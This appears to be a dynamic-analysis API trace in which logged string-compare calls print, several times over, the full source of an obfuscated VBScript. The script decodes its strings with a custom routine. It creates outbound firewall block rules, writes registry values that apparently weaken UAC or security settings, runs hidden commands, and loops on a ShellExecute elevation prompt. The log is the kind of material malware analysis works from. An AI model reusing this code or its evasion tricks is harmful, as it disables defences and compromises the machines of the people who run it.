bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -3 [0222.926] wcsncmp (_String1="index = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 92 [0222.926] wcsncmp (_String1="ndex = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 97 [0222.926] wcsncmp (_String1="dex = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 87 [0222.926] wcsncmp (_String1="ex = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run 